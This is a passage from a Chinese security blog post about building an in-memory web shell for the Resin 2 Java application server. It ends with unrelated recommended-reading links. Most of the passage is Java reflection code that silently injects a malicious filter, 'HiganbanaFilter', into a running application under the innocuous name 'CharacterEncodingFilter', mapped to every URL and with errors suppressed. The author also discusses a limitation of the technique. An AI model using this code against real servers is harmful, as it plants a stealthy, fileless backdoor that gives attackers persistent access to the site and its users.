文章插图
后面直接添加即可
主要代码
private static void doInject(){filterName = "CharacterEncodingFilter-" + System.nanoTime();try {if (APPLICATION !=null){// Regexp//Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");//Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);//Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");// QFilterConfigClass QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(getClazz("com.caucho.server.http.Application"), String.class, String.class, getClazz("com.caucho.util.RegistryNode"));QFilterConfigConstructor.setAccessible(true);Object QFilterConfigObj = QFilterConfigConstructor.newInstance(APPLICATION, filterName, "HiganbanaFilter", null);// FilterMapClass filterMapClazz = getClazz("com.caucho.server.http.FilterMap");Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();filterMapConstructor.setAccessible(true);Object filterMap = filterMapConstructor.newInstance();// set FilterMap regexpMethod setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);setRegexpMethod.setAccessible(true);setRegexpMethod.invoke(filterMap,"/*", null);// set FilterMap dataMethod setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);setDataMethod.setAccessible(true);setDataMethod.invoke(filterMap,QFilterConfigObj);// add FilterMap 2 _filterMapArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");_filterMap.add(filterMap);// add QFilterConfig 2 _filterListArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");_filterList.add(QFilterConfigObj);// put QFilterConfig 2 _filtersHashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");_filters.put(filterName, QFilterConfigObj);}} catch (Exception e) {}}private static void getApplication(){Thread thread = Thread.currentThread();ClassLoader contextClassLoader = thread.getContextClassLoader();Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader,"attributes");APPLICATION = attributesObj1.get("caucho.application");}【Java安全之Resin2内存马】但是有个弊端,debug逻辑的时候发现 , 只有在当前web.xml中已经存在有filter才能添加进去 。暂未解决该问题 。最后项目遇到的感觉比较有趣且极端的问题 , 虽然也不是很好的解决方案 。
推荐阅读
- 牧羊人之心冒险者勋章怎么获取
- 猫之城定向作战活动怎么玩
- 无期迷途污染之巢背叛怎么打
- 金铲铲之战小小阿卡丽多少钱
- Jmeter之聚合报告“造假”
- SimpleDateFormat线程安全问题排查
- 明日之后秘岛初显任务完成流程攻略
- 部落冲突哥布林之王的贡品雕像获取方法
- 原神8.13复原械画部件之二图文攻略
- BODYCOMBAT认证之路